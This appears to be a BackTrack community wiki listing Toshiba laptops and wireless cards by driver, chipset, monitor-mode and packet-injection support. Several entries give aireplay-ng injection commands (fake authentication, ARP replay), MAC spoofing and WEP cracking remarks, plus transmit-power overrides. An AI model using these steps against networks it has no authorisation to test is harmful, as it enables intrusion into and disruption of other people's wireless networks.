wlanconfig ath0 create wlandev wifi0 wlanmode monitor

* Although you select 1024×768 mode, settings indicate its running at full 1280×800 res. In any case it seems all modes work and display is great!

Satellite A200-12C2D

* Runs fine out of the box
* Core2 Duo T5250 1.5GHz
* Mobile Intel GM965 X3100 runs at 1204 x 768
* Intel PRO/Wireless 3945ABG

Satellite A215-S4767

* these notes are bt3beta specific
* needs acpi=off to prevent hang during boot
* xconf makes X unstartable, either copy xorg.conf-vesa to xorg.conf or use
* http://ati.amd.com/support/drivers/linux/linux-radeon.html
* installing that, then running xconf produces 1200×800 res in X
* however, the ati supplied driver, once installed kills network access (eth0 dies)
* mini-pci-e card atheros AR5007GE (RF 5424) works, but packet injection seems to fail
* dbt boot param enables both cores of turion-64-X2

Satellite A215-S7437

* needs acpi=off to boot up
* xconf makes X unstartable, just use startx
* uses REALTEK RTL8187B
* driver http://rapidshare.com/files/175306385/r8187b.lzm
* after installing driver type in “modprobe r8187″
* audio does not work

Satellite M105-S3041

* Runs fine with no extra parameters.
* Video resolution is set at 1024*800, very nice!

-eristic
Satellite A85-S107

* Runs great no extra parameters
* Video runs 1024×768, sound works 😉
* Modem is winmodem, which sucked in windows too

Satellite A- (incomplete model number)

* My laptop has an ipw2200 wireless nic and it requires irqpoll option at boot time.

Satellite P105-S6197

* Runs fine with no extra parameters.
* If you want to get the onboard Intel Wireless card to work you will need to run:

/usr/src/drivers/ipw3945-1.2.0/load
ifconfig eth0 up
dhcpcd eth0

* Video Resolution is set at 1024*768 on startup, decent.
* If you want a higher res, use the i810 driver in your xorg.conf file.
* Conexant HD Audio does not work.

Satellite P200-1I3

Brief Hardware Components List: Intel Core Duo @1,7GHz, 2GB RAM, ATI Mobility Radeon HD2600, 17” Wide LCD, Built-In Atheros WiFi Card

Works with BT3:

* I didn’t want to install the ati.lzm file, so the resolution was not very high, but comfortable and usable (I wonder it was 1024×768, but it filled the full screen).
* You should choose the KDE VESA mode during the boot, otherwise you get an X server error.
* The built in Atheros mini-pci-e WiFi card works without any problems (only in BT3!!), packet injection: 500packet/sec, it can be used as in tutorials.

* BT2: It boots without any problem, but it doesn’t recognize the atheros wifi card (too old madwifi driver). You are strongly recommeded to use BT3.

Satellite Pro A100

* Did not work on PSAA3C-ED10XE

“LiveData not found…try booting from HD”
“Unable to load NLS charset utf8”
“Something went wrong and we can’t continue. This should never happen.”
“Can not create directory ‘…’: Read-only file system”
“linuxrc: 171” and “linuxrc: 188”

Satellite Pro 460CDT

* Runs ok when installed, very slow when live.
* I recommend using Fluxbox, as KDE is too hard on its limited hardware (P1 166 MMX !)
* USB works
* Internal Modem works!
* PCMCIA works (needs setting to 16 bit cardbus mode in bios)
* Sound is broken
* Screen size is OK once in the Desktop environment, (800×600), but is too large during boot, fixed by running liloconf, after install.
* GPS sort of works but GPS daemon takes for ever to determine the baud rate (on acount of limited hardware), could be fixed by installing an earlier version, and using the -s switch to set the baud rate.
* Using packet injection (or recieving too many packets/sec) using airodump-ng, or snort, causes lockups, or segfaults.
* Compiling any code, also causes segmentation faults (sig 11), Hardware related.

Satellite Pro 4600

PIII 700 128Mb ram

* Runs flawlessly, when installed, and at an acceptable speed from CD.
* Compiling source can be time consuming.

Satellite Pro 6100

* lspci output

Satellite A135-S2386

boots but freezes on after cs: IO port probe 0x100-0x3af:_ anybody know what can fix this ?
try at boot time -> boot: bt acpi=off
Satellite U305-5077

Runs fine, except for two issues

* Intel video needs some tweaking to run at 1280×800. Followed instructions from slangnz on the binary 915resolution found at http://forums.remote-exploit.org/showthrea…ght=intel+video and it worked.
* Wireless card “recognized” as Atheros Communications, Inc. Unknown device 001c. Will work with the latest windows drivers and ndiswrapper. See post #18 on thread http://forums.remote-exploit.org/showthread.php?t=7822. NOTE: This card won’t do most of the cool things other Atheros cards will because you have to use ndiswrapper to make it work. It is currently not supported by the MadWifi Atheros drivers.

EDIT: It seems, that with BT3 this laptop operates without any problems. So, the updated MadWifi driver recognises the card. Packet injection works also! See: http://forums.remote-exploit.org/showthread.php?t=10399
Satellite 2805-S301

* Runs fine with no extra parameters.
* Video resolution is set at 1024*768, instead of the hardwares default 800*600

Satellite Pro 4600

* model PS460E-0C91Q-PL
* Runs with no extra parameters.

Satellite A70

* Works perfectly (Model RW1)
* No extra parameters

Satellite m105-s3064

works perfectly right out of box

posted by purehate
Satellite A110

* Works perfectly (Model 352)
* No extra parameters

Satellite L10-236

* Runs fine with no extra parameters.
* Make sure to use “xconf” before using the GUI or the graphics will get blurry

Satellite L20-182

(No feedback provided)
Satellite L30-113

* Model/Part number PSL33E-xxxxxxxx

Satellite M30X

* Works perfectly

Satellite S1800-804

(Modelnumber PS181E-0CCFJ-NO)

* Works perfectly with USB and all.
* Sound works!
* No extra parameters
* Tested both live and installed BT2
* Running both integrated wired LAN and PCMCIA Wireless

Satellite L35-S2366

At boot time use:
boot: bt acpi=off, if not it will freeze at “cs: IO port probe 0x100-0x3af:”
Also a message about audio (alsa driver)”hda_codec: invalid dep_range_val 0:7fff” will repeat
at boot for 40sec or so… can be ignored
No sound.
Tecra
Tecra A6

Boots OK. The screen is 1280×800, so I had to move the xorg.conf-vesa to xorg.conf before doing a “startx” (in /etc/X11). Kismet works with the inbuilt Intel a/b/g wireless card. Ethernet and trackpad mouse work fine. Audio doesn’t seem to work (with Kismet, anyway).
Tecra A7

Problem with USB, otherwise everything else works (ethernet, builtin wireless, audio, visual, mouse).
Tecra A9 [S9015]

(BT3)Freezes @ Triggering udev events: /sbin/udevtrigger
Currently only booting with the ‘nohotplug’ will get you beyond the udevtrigger.
This will bring you to the old text logon.
Note: udevtrigger is hanging on the pci subsystem.
Running ‘udevd –daemon;udevtrigger –subsystem-nomatch=pci’ will allow you to start X and give you some usability.
Tecra S1

* All ok with default boot, res is 1024 x768.

[good fonts!]
Tecra M2

* All works Great!

Tecra M5

* Everything Works perfectly.

[good fonts!]
Tecra M9

* Boot freezes @ triggering udev events: /sbin/udevtrigger (See Tecra A9 above)

Tecra

* Does not detect mouse drivers.

Elenco delle schede di rete compatibili con backtrack

Tested Card List
PCI
Asus WL-138g v2

* Driver : bcm43xx
* Chipset : Broadcom
* External Antenna: Reverse connector (RP-SMA) with a detachable antenna

Works out of the box.

Belkin F5D8001

* Works out of the box.

CNet CWP-854

* Driver : rt2500
* Chipset : Ralink 2500
* External Connectors: RP-SMA
* Works out of the box.

Dlink DWA-520

* Driver : Madwifi-ng
* Chipset : Atheros
* External Connectors : RP-SMA
* Works out of the box in BT3 Final. Injection is perfect.
* Product link : http://www.dlink.com.my/products/?idproduct=199

Dlink DWA-552

* Driver : Madwifi-ng
* Chipset : Atheros AR5212 a/b/g/n
* For Kismet, edit your kismet.conf file (/usr/local/etc/kismet.conf) to “source=madwifi_g,wifi0,Atheros”
* Notice: To set up your MAC (optional) and switch into Monitor Mode type:

airmon-ng stop ath0

macchanger -a wifi0

iwconfig ath0 mode Monitor

Dlink DWL-AG530

* Works out of the box.

Dlink DWL-G520

* Chipset : Atheros
* External Antenna: RP-SMA
* Works out of the box.

Dlink DWL-G550

* Chipset : Atheros AR5212 (within AR5002X)
* External Antenna: Yes, omni-directional dipole antenna with 5dBi
* Works great out of the box.

http://www.dlink.com/products/?sec=0&pid=414

Dlink DWL-G510

* Chipset : Atheros AR5212a/b/g; Ralink RT73
* Driver : madwifi-ng; rt73
* External Antenna: REV-SMA

Read here
Dynex DX-EBDTC

* Chipset : Broadcom
* Works right of of box. Injection and monitor mode IS supported.

Foxconn WLL-3350

* Driver: rt2500

MSI PC60G

* Driver : RT61
* Chipset : Ralink
* Works out of the box. Injection and such (wireless tools) not functional

http://global.msi.com.tw/index.php?func=pr…&maincat_no=131

Netgear WG311T

* Driver : Madwifi-ng
* Chipset : Atheros
* External Antenna: RP-SMA Connector

Works perfectly out of the box. Injection works as Well. http://www.netgear.com/Products/Adapters/S…ers/WG311T.aspx
Netgear WPN311

* Driver : Madwifi-ng
* Chipset : Atheros
* External Antenna: RP-SMA Connector

Works great out of the box including injection.

SMC SMCWPCI-G

* Chipset : Atheros
* Antenna Type : External SMA (detachable)
* Operating Range :

• Outdoors up to 1.312ft / 400m
• Indoors up to 328ft / 100m

Works great out of the box including injection
Mini PCI (Built in)
Broadcom BCM4306 802.11b/g (rev 3)
Environment Compatibility
Hardware ver ↓ Software ver ↓ Internet ↓ Monitor ↓ Injection ↓
Dell 1350 WLAN Mini-PCI 2.6.20-BT-PwnSauce-NOSMP bcm43xx yes yes no
HP Pavilion ZV5330us bcm43xx ? ? no
HP Pavilion zd8000 bcm43xx yes yes ?
Compaq Presario 2500 bcm43xx yes yes no

* Driver : bcm43xx
* Notebook HP NX6110 model PT601AA#AKD
* Notebook HP Pavilion ZV6170us (part of zv6000 series)
* Notebook Compaq Presario V2405CA Not sure what chipset it is but doesn’t work with built in Broadcom B/G
* Notebook acer TravelMate 2413LMi Not sure what chipset it is but Packet injection does not work with buit in Broadcom B/G

Broadcom BCM4318 802.11b/g

* Driver : bcm43xx
* Notebook Compaq v2312us – It will capture packets but does not inject.
* Notebook HP Pavilion dv5215us – Injection works! http://forums.remote-exploit.org/showthread.php?t=7190 First place card in monitor mode (include channel of target AP):
* AirForce One 54g – Injection works but you need to have a recent version of aircrack-ng (it worked for me with the 0.9)

bt ~ # ifconfig eth0 up
bt ~ # iwconfig eth0 mode Monitor channel #

Use aireplay-ng attack 1 (fake authentication) and then attack 3 (ARP request replay attack). ~40,000 packets injected in <5 minutes. -theprez98

* Notebook Acer 5000 – It will capture packets but does not inject.

IBM AR5212 802.11abg NIC (rev 01)

* Driver : Atheros

IPW2100

* Driver : IPW2100
* Special Notes: Will enter monitor mode, but cannot inject.

===================================== YES for IPW2200 Sorry, but it works with injection patch I use ipw2200-1.2.1 and package of aircrack.0.90 need to compile, and install Kismet works fine but I prefer airodump-ng Attack works under aireplay -2 -3 -4 -5 and -9, but not for -0 and -1

IPW2200

* Driver : IPW2200 (With Injection Patches)

* Boots Live and installs on hard drive detecting and installing the ipw2200 pached drivers perfectly (also on dual and multi-boot environments (MacOS, Vista, XP, BT)
* About Injection, Void11 cannot be used to deauth stations. ONLY the “–interactive”, “–arpreplay” and “–chopchop” options of Aireplay-ng work, due to an ipw2200 limitation. You must enable the rtap0 interface executing the following commands to make injection posible before doing anything else:

– rmmod ipw2200
– modprobe ipw2200 rtap_iface=1
– ifconfig eth1 up
– ifconfig rtap0 up

* Injection has proven to be succesfull with “-i rtap0 eth1” interface parameter at the end of your aireplay-ng –arpreplay command. This allows to capture at the same time using the rtap0 interface with other programs.

Example of arp injection command:

– aireplay-ng –arpreplay -b 00:00:00:00:00:00 -h 11:11:11:11:11:11 -i rtap0 eth1

* GUI Wireless tools are at early development. Sometimes they don’t work as expected and network parameters must been set in konsole. Things may appear failing when they are actually working:

– Wireless assistant may say “connection failed” but you are associated with the AP.
– Running Kismet a 2nd time does not work because inteface is set in monitor mode.
– Injection failing because deauth attack is not posible, but deauth is not the only method.

* You may feel misfuncionalities when following tutorials step by step without ANY previous knowledge, especially those for Wep cracking because of its complexity. But the true is that full funcionality is found on this chipset except for a few injection attacks that doesn’t prevent you from auditing WEP and WPA wireless security. But to achieve this you have to learn and master some essential of linux connectivity tasks, and commands to set up network parameters using the console and troubleshoot results. You only have to check the manuals, learn and practice all possible options of the following 5 commands to be succesfull with this nice integrated ipw2200 chipset:

– ifconfig
– iwconfig
– iwlist
– modprobe
– ping

aireplay only thing not working

Will not inject even with the patch enabled.

Kismet & AirMon didnot work for me.

Kismet did work for me.

Good tutorial for injection can be found here: http://tinyshell.be/aircrackng/forum/index.php?topic=1775.0

This tutorial worked out of the box for me, no driver patching required, however ony aireplay-ng injection attacks -2, -3, and -4 work though.

Injection is working alright, but you can only inject data frames (arp injecting works, for example). That means deauth and other attacks that may require management frames can’t work. Bear in mind you must use rtap_iface=1 when loading the module to use the rtap interface, through which you can sniff while you inject in the eth interface (you have to do it that way or it won’t work).

Be careful with the new 2.6 kernels, you may need to use irqpoll at boot to avoid an IRQ conflict on your computer -see below ipw3495 (in that case the conflicting device won’t work at all so if it’s just injection that fails, it’s not an irqpoll problem).

We could not use any injecion on this due to it using Centrino technology.
WN360G

* Driver : prism54/p54
* Use a PCI to MiniPCI adapter with it.
* lspci output :
* FCC ID: QDWWN360G

01:07.0 Network controller: Intersil Corporation ISL3890 [Prism GT/Prism Duette]/ISL3886 [Prism Javelin/Prism Xbow] (rev 01)
Mini PCIe (Built in)

* Gigabit Atheros card works, but you have to use ‘airmon-ng start wifi0’ to set it into monitor mode.
* Broadcom 4311-based Dell Wireless 1390 adapter is detected and works as mentioned below. Monitor mode works but packet injection doesn’t seem to be working.

Broadcom BCM4311 802.11b/g

* Driver : bcm43xx
* Driver : bcmwl5.sys
* Notebook HP nx6315
* Notebook HP nx7400
* Notebook Dell Inspiron 1501
* Notebook Dell Inspiron 1505\6400
* Notebook Dell Latitude d820

D820 is detected and works but the BCM4311 chip does not work with packet injection

* FCC ID: MXF-C941103G
* Notebook Dell Dell d520
* Notebook Compaq/Dell V2000US is NOT working. Packets appear to send but after testing on a separate card I was able to determine that NONE of the attack modes work properly.

Windows Drivers and Client Software: http://www.wireless-driver.com/download/br…BG-Driver_0.htm

PCI ID:
BCM43XG, PCI\VEN_14E4&DEV_4320&SUBSYS_00E70E11
BCM43XGT, PCI\VEN_14E4&DEV_4320&SUBSYS_12F4103C
BCM43XG1, PCI\VEN_14E4&DEV_4320&SUBSYS_12F8103C
BCM43XG2, PCI\VEN_14E4&DEV_4320&SUBSYS_12FA103C
BCM43XG3, PCI\VEN_14E4&DEV_4320&SUBSYS_12FB103C
BCM43XM1, PCI\VEN_14E4&DEV_4324&SUBSYS_12F9103C
BCM43XM2, PCI\VEN_14E4&DEV_4324&SUBSYS_12FC103C

BCM43XG1, PCI\VEN_14E4&DEV_4318&SUBSYS_1355103C
BCM43XG2, PCI\VEN_14E4&DEV_4318&SUBSYS_1356103C
BCM43XG3, PCI\VEN_14E4&DEV_4318&SUBSYS_1357103C
BCM43XM1, PCI\VEN_14E4&DEV_4319&SUBSYS_1358103C
BCM43XM2, PCI\VEN_14E4&DEV_4319&SUBSYS_1359103C
BCM43XM3, PCI\VEN_14E4&DEV_4319&SUBSYS_135A103C

BCM43XG11, PCI\VEN_14E4&DEV_4311&SUBSYS_1363103C
BCM43XG12, PCI\VEN_14E4&DEV_4311&SUBSYS_1364103C
BCM43XG13, PCI\VEN_14E4&DEV_4311&SUBSYS_1365103C
BCM43XM11, PCI\VEN_14E4&DEV_4312&SUBSYS_1360103C
BCM43XM12, PCI\VEN_14E4&DEV_4312&SUBSYS_1361103C
BCM43XM13, PCI\VEN_14E4&DEV_4312&SUBSYS_1362103C
BCM43XM14, PCI\VEN_14E4&DEV_4312&SUBSYS_135F103C

IPW3945

* Driver : IPW3945
* Special Notes : Enable the drivers via KDE menu or cd /usr/src/drivers/ipw3945-1.2.0/ && ./load
* Special Notes : Enters monitor mode, but cannot inject
* Special Notes : You may need to start the image with “bt irqpoll” Good way to tell: you see what looks like function call backtraces on startup and the suggestion to run “bt irqpoll” scrolls by pretty fast. Check your dmesg for more details if it scrolls too fast for you.

IPWRAW (IPW3945 Monitor + Inject)

* Driver : IPWRAW, A guide can be found [here]
* Or an easy to use lzm module can be found here [here]
* Note : This driver is not included in Backtrack2 by default.
* Special Notes : Locked in monitor mode and can be used in all aireplay-ng attacks.
* For Kismet, edit your Kismet.conf to “source=ipw3945,wifi0,Intel”
* Notice: After starting airodump-ng only run one command at a time. If you do not your system may hang or freeze.

ifconfig wifi0 down
#Change to AP BSSID
nano /sys/class/net/wifi0/device/bssid
# Channel of AP
nano /sys/class/net/wifi0/device/channel
# Change from 108 to 2
nano /sys/class/net/wifi0/device/rate
ifconfig wifi0 up
airodump-ng rtap0
#wifi0 is used for all other commands.

IPW4965/IWL4965 agn

* Monitor: yes, works natively on backtrack3
* Injection: no, there are works being done on it.

To load the driver

modprobe iwl4965

Gigabyte GN-WS50G b/g

* Driver: Madwifi-ng
* Managed: yes
* Monitor: yes
* Injection: yes

PCMCIA Cards
3COM 3CRWE154G72 v1

* Driver : prism54/p54
* Chipset : Intersil PrismGT FullMAC
* Notice : other revisions of this card are not prismGT FullMAC

3COM 3CRPAG175B with XJACK Antenna

* Driver : Madwifi-ng
* Chipset : Atheros AR5212
* Notes : detected at boot time, injection works, everything goes like in aircrack-ng tutorials

Agere Systems ORiNOCO GOLD PC Card Classic

* Notes: see Enterasys Roamabout 802.11 DS High Rate

AirLink101 AWLC4130

* Driver : Madwifi-ng
* Chipset : Atheros
* Notes: Found at boot up. Forum users report 100% working, making this the cheapest working Atheros (and maybe overall) card out there.

ASUS WL100G

* Driver : bcm43xx
* Chipset : Broadcom BCM43xx
* Notes: It is found at boot-up and is ready to go.

Belkin F5D6020 v3

* Driver : Realtek
* Chipset : rtl8180
* Notes: Requires terminal input of iwconfig and dhcpcd wlan0
* Notes: Full capability and injection

Belkin F5D7010 V1000

* Driver : bcm43xx
* Chipset : Broadcom BCM43xx
* Notes: Detected at boot-up and is ready to go. Didn’t have an opportunity yet to test the packet injection so can’t report on that.

Belkin F5D7010 V3000UK

* Driver : RT61
* Chipset : Unknown will update later (SORRY)
* Notes : Detected at boot-up with final BT2 (ra0). I have no had any problem to put it in Monitor mode; unfortunately packet injection does not work.

Belkin F5D7010 V5000

* Driver : Atheros
* Chipset : Atheros
* Notes : Works great from what I could tell. Detected at boot-up with latest BT2. Packet injection appears to work.

Belkin F5D7010 V6000

* Driver : RT61
* Chipset : Ralink
* Notes: after untar the files, in the Module dir, make clean, make debug and then make install then modprobe rt61 debug=1

Belkin F5D7011

* Driver : bcm43xx
* Chipset : Broadcom 4306
* Notes: Picked up on boot and I can inject into my router without a problem.

Buffalo WLI-CB-G54HP

* Driver : bcm43xx/b43
* Chipset : Broadcom BCM4318
* Notes: It is found at boot-up and is ready to go. Packet injection works perfectly.

Use b43 driver and mac80211. bcm43xx will not show correct PWR levels in airodump-ng and may have issues with injection if not at PPS (Packets Per Second)
Cisco AIR-LMC350

* Driver : airo_cs
* Chipset : Cisco Aironet
* Monitor mode HOWTO
* Special Notes : airodump-ng output on wifiX shows garbled output whilst ethX does not work. Kismet will work with this card. More information: airo

Cisco AIR-PCM350-T

* Driver : airo_cs
* Chipset : Cisco Aironet
* Monitor mode HOWTO
* Special Notes : airodump-ng output on wifiX shows garbled output whilst ethX does not work. Kismet will work with this card. More information: airo

Cisco Aironet AIR-CB21AG-A-K9

* Driver : Madwifi-ng
* Chipset : Atheros
* lspci : 03:00.0 Ethernet controller: Atheros Communications, Inc. AR5212 802.11abg NIC (rev 01)

Dlink DWA-645

* Driver: Madwifi-ng
* Chipset: Atheros AR5416 a/b/g/n
* External Antenna: None
* Comments: BT2’s copy of madwifi cannot be detected. You will either need to download the latest driver from madwifi.org or from the cvs/svn trunk. The N part of this card will not work as there are no support under madwifi yet. Kismet could use the b and g portion of the card but n remains untouched. Slow network detection too with built-in antennas.
* Update: Have a look at ath9k project.. no information on monitoring or injection but project looks promising.

Dlink DWL-650+

* Driver : acx100
* Chipset : Texas Instruments ACX100
* Special Notes: Enable the drivers via KDE menu or cd /usr/src/drivers/acx100/ && insmod ./acx100.ko

got an error and modified it a bit and it worked. cd /usr/src/drivers/acx100 && insmod ./acx.ko
Dlink DWL-G650

* Driver : Madwifi-ng
* Chipset : Atheros AR5212 a/b/g
* For Kismet, edit your kismet.conf file (/usr/local/etc/kismet.conf) to “source=madwifi_g,wifi0,Atheros”
* Notice: To set up into Monitor Mode type:

airmon-ng start wifi0
ifconfig ath1 up
iwconfig ath1 mode Monitor

Dlink DWL-G630, 650+/-

Refer to this site for information.
Dlink DWL-G650M

* Chipset: Atheros Communications, Inc. AR5005VL 802.11bg Wireless NIC (rev 01)

This chipset is not yet supported as it is a MIMO capable chip.
D-Link WNA-1330

* Driver : Madwifi-ng
* Chipset : Atheros

When the card is enabled and in monitor mode it can not change back to channel 1 via iwconfig commands.

iwconfig ath0 channel 1

Will not work. It will not COMPLAIN either. So unless you are actually double-checking the freq you are on, you don’t know that it’s not working.

To get the card back on channel 1 for monitoring, you’ll have to ifconfig ath0 down, iwconfig ath0 channel 1, and then ifconfig ath0 up.[3]
Enterasys Roamabout 802.11 DS High Rate

* Driver : orinoco_cs, wvlan_cs, wavelan_cs
* Chipset : Hermes I
* Mode : 802.11b only (11Mbps)
* Driver capabilities : Connect + Monitor only
* Driver Source 1 : http://www.nongnu.org/orinoco/
* Driver Source 2 : http://www.projectiwear.org/~plasmahh/orinoco.html
* Driver Source 3 : http://secure.enterasys.com/software/RoamAbout/CSIxD/linux/
* Firmware supplied : Lucent/Agere 8.72
* Firmware downloads source 1 : http://orinoco.gotchi.at/
* Firmware downloads source 2 : http://www.andrewhakman.dhs.org/orinoco/files/
* More information: http://airsnort.shmoo.com/orinocoinfo.html
* firmware extract (download for 2.6.28 and above) howto: http://tuxsavvy.vox.com/library/post/compu…extraction.html
* Notes :

The firmware supplied cannot be used to monitor as orinoco_cs notes the firmware as buggy. Suggested to downgrade the firmware may help. You will need to downgrade to 7.52 and apply 3.2.1 patch.

http://gentoo-wiki.com/HOWTO_Orinoco_USB#Kismet Hermes I version for sniffing.

* Update:

Theoretically one is able to use airjack to make hermes do some mitm attack however that will require more deeper analysis.
Gigabyte GN-WM01GT AirCruiserG Mach G

* Driver : madwifi-ng
* Chipset : Atheros
* 2.4Ghz 802.11b/g 108Mbps with internal antenna.
* Notice : Seems to work 100%. Interface is: ath0

Lucent Technologies Orinoco Silver

Works perfectly out of the box. However, this card doesn’t support packet injection because it is Hermes I based. It is perfect for wardriving and sniffing wireless networks though.

* Note: see section: Enterasys Roamabout 802.11 DS High Rate

Linksys WPC11v4

* Driver: rtl8180
* Chipset: rtl8180
* Notes: Requires terminal input of iwconfig and dhcpcd wlan0
* Notes: Full capability including injection

Linksys WPC54G v3

* Driver : bcm43xx/b43
* Chipset : Broadcom Corporation BCM4318 [AirForce One 54g] 802.11g Wireless LAN Controller (rev 02)
* Subsystem: Linksys WPC54G-EU version 3 [Wireless-G Notebook Adapter]

Monitor mode currently supported but injection may or may not work with bcm43xx. Apparently a new driver is coming out dubbed as b43 and is only available in either kernel >=2.6.24 and/or wireless-2.6 git. Injection will work after patching b43 via mac80211 stack. bcm43xx driver will soon be deprecated and for this chipset it will not indicate PWR levels with airodump-ng.
Motorola WN825G v2

* Driver : bcm43xx
* Chipset : Broadcom 4306

Card is recognized in response to “iwconfig” but LEDs do not illuminate until “ifconfig eth# up”. Injection not tested but should work similarly to other Broadcom cards. See here for Broadcom injection.
NetGear MA401

* Driver : HostAP
* Chipset : Prism 2

To inject packets you have to load the HostAP driver. [4].

BT3 Users read this.
NetGear WPN511

* Driver : Madwifi-ng
* Chipset : Atheros
* Comments: Monitor mode and packet injection supported. All current supported attack modes 0-5 tested and working perfect.

NetGear WPN511 – Range Max

* Driver : Madwifi-ng
* Chipset : Atheros AR5212 a/b/g
* Internal Antenna: 2 x Hirose UF.L. One of them has connector the other does not have one soldered on.
* Comments: Monitor mode and packet injection supported. Also known as WPN511GE, exactly the same chipset.

NetGear WG511T

* Driver : Madwifi-ng
* Chipset : Atheros
* Notes: Works with Backtrack, (out of the box).

Supports all current Aireplay-NG attacks (-1,-2,-3,-4,-5)

If you can’t get this card to run in Monitor mode try the following:

BT ~#airmon-ng stop ath0

BT ~#airmon-ng start wifi0

Then run iwconfig and check if ath0 is in Monitor mode. If it still isn’t, try the following:

BT ~#ifconfig ath0 down

BT ~#airmon-ng start ath1

wifi0 should now parent ath1, and ath1 should be in Monitor mode. If it isn’t, try:

BT ~#airmon-ng start wifi0
NetGear WAG511v2

* Driver : Madwifi-ng
* Chipset : Atheros

NetGear WG511 v1

* Driver : prism54/p54
* Chipset : Intersil PrismGT FullMAC
* Notice : See here for Netgear’s ambiguous naming of models.
* lspci : 03:00.0 Network controller: Intersil Corporation ISL3890 [Prism GT/Prism Duette]/ISL3886 [Prism Javelin/Prism Xbow] (rev 01)

Works great with Backtrack 2 Final, have cracked many WEP keys. Supports packet injection. These cards are extremely rare but they sport 2x Hirose U.F.L connectors internally.
NetGear WG511 v2

* Driver : prism54/p54
* Chipset : Intersil PrismGT FullMAC
* Notice : See here for Netgear’s ambiguous naming of models.
* lspci : 03:00.0 Network controller: Intersil Corporation ISL3890 [Prism GT/Prism Duette]/ISL3886 [Prism Javelin/Prism Xbow] (rev 01)

Like its brother NetGear WG511 v1 this one also works well except it only has 1x Hirose U.F.L connector. See here for information on external antenna hack.
NetGear WG511 v3

* Driver : p54
* Chipset : Conexant PrismGT SoftMAC
* Notice : See here for Netgear’s ambiguous naming of models.

This card requires compat-wireless or kernel build later than 2.6.24 mainly because its a softmac and it was not heavily supported until the release of p54. The release of p54 driver depends on mac80211 rather than ieee80211 (old and deprecated support for other softMAC based devices). Do not hold your breath for monitor/injection support either.
NetGear WG511v2

* Chipset : Marvell
* lspci : Marvell Technology Group Ltd. 88w8335 [Libertas] 802.11b/g Wireless (rev 03)
* lspci -n : 11ab:1faa (rev 03)
* FCC ID : PY3WG511V2H1
* CANADA ID : 4054A-WG511V21
* CE : 0470

There are no native linux driver support for this chip. If you want to gain native linux driver support, you should email Marvell directly.
Netgear WG511U

* Driver : Madwifi-ng
* Chipset: Atheros AR5212 a/b/g
* External Antenna: None
* Internal Antenna: 2 x Hirose UF.L. One of them has connector the other does not have one soldered on.

NetGear WPN511GR

* Driver : Madwifi-ng
* Chipset : Atheros

Netgear WPNT511

* Driver: N/A *Windows only: ndiswrapper*
* Chipset: Airgo AGN300 True MIMO
* External Antenna: None
* Comments: No linux drivers yet. Ndiswrapper may work for normal connection but nothing else.
* Update: Linux native (alpha stage) available: http://sourceforge.net/projects/agnx80211driver/. This requires kernel version either 2.6.24 or wireless-git-2.6.24 package. Not recommended for beginners and not patched at all yet.

PROXIM ORiNOCO 802.11b/g Gold (Model: 8470-WD)

* Driver : Madwifi-ng
* Chipset : Atheros
* Notice : To set monitor mode type “airmon-ng start wifi0” and then use ath1
* If your card does not appear to be recognized when you first insert it, type “modprobe ath_pci” and then run “dmesg” again.
* For Kismet, edit your Kismet.conf to “source=madwifi_g,wifi0,Atheros”

Windows Drivers and Client Software: http://support.proxim.com/cgi-bin/proxim.c…hp?p_faqid=1082

Linux Drivers: http://www.madwifi.org
Senao NL-2511CD/SL-2511CD PLUS EXT2

* Driver : HostAP (wlan-ng drivers have been removed from BT2 final. See here to use HostAP driver)
* Chipset : Prism 2.5
* Firmware : 1.74 is suggested, check [here] for instructions.
* FCC ID: NI3-2511CD-PLUS3
* For Kismet, edit your Kismet.conf to “source=hostap,Wlan0,Prism2”
* Notes: If you are using orinoco_cs drivers, you need to follow this as orinoco_cs is not recommended for this device.

BackTrack3 Users should try this OR this if their card is not automatically detected under BT3 or no injection is available.

* To raise the output of this card to 250mw Not verified

Caution! This might destroy your card if you do not know exactly what your doing!
The change in readmif seems stable only in Master mode.

ifconfig wlan0 up
iwpriv wlan0 alc 0
iwpriv wlan0 readmif 116 [-> actual powertx value]
iwpriv wlan0 writemif 62 49 [-> I’ve no idea at all why “49”]
iwpriv wlan0 readmif 116 [-> now showing something around 252]

With a Spectran HF-2025E spectrum RF analyzer from elektrosmog.de
Here are the results: [5][6][7]
Force the card to give the maximum txpower.

iwpriv wlan0 alc0
iwpriv wlan0 writemif 62 128

Force the card to give the somewhat minimum txpower.

iwpriv wlan0 writemif 62 127

Sitecom WL-100b

* Driver: bcm43xx
* Chipset: Broadcom 4306
* External Antenna: None
* Notes: Tested with BackTrack 3 beta released on 14th December 2007, 700MB CD version (bt3b141207.iso).
* Notes: Both monitor mode and packet injection work fine (with the following caveats below).
* Notes: The wireless interface is eth1, and it must be “brought up” before use. The command to do this is:

ifconfig eth1 up

You will now see the “Power” and “Link” lights have turned on, which indicates that the card is ready for use.

* Notes: When using the –arpreplay option of aireplay-ng, the default packet speed is too fast for the bcm43xx driver to handle, so it keeps crashing every hundred packets or so. To fix this, add option: “-x 30” to the command line, which will limit aireplay-ng to 30 packets per second. I’ve found that “30” is the highest value it can take without crashing. This will slow things down quite a bit, but not too badly and at least it works.

SMC 2532W-B

* Driver : HostAP
* Chipset : prism2.5

SMC SMC2536W-AG

* Driver : Madwifi-ng
* Chipset : Atheros AR5212 a/b/g
* External Antenna : None

SMC WCB-G

* Driver : Madwifi-ng
* Chipset : Atheros

SWEEX LW051 ver:1.0

* Driver : Madwifi-ng
* Chipset : Atheros AR2413A
* Notes: It is found at boot-up and is ready to go, but BT2 says it is a AR5212 which seems to make no difference. Packet injection works perfectly.

TP-link SuperG&eXtended Range 108M Wireless Cardbus Adapter(TL-WN610G)

* Drivers : MadWifi-ng
* Chipset : Atheros AR5212 802.11abg NIC (rev 01)

* [External Antenna Modification]

TP-link eXtended Range 54M Wireless Cardbus Adapter (TL-WN510G)

* Drivers : MadWifi-ng
* Chipset : Atheros AR5212 b/g

Ubiquiti SRC

* Driver : Madwifi-ng
* Chipset : Atheros AR5212 a/b/g
* FCC ID: SWX-SRC
* lspci : 03:00.0 Ethernet controller: Atheros Communications, Inc. AR5212 802.11abg NIC (rev 01)

Product Page
Wistron WLAN 802.11a/b/g Cardbus CB9-GP

* Driver : madwifi-ng
* Chipset : Atheros AR5212

X-Micro WLAN 11g PCMCIA Card (XWL-11GPAG)

* Driver : Madwifi-ng
* Chipset : Atheros

ZCom XI-325HP+

* Driver : HostAP
* Chipset : Prism 2.5

Zyxel ZyAIR G-100 PCMCIA Card (FCC ID:N89-WE601l)

* Driver : prism54/p54
* Chipset : Intersil PrismGT FullMAC

USB Dongles
Airlink101 AWLL3026

* Driver : zydas
* Chipset: zd1211rw
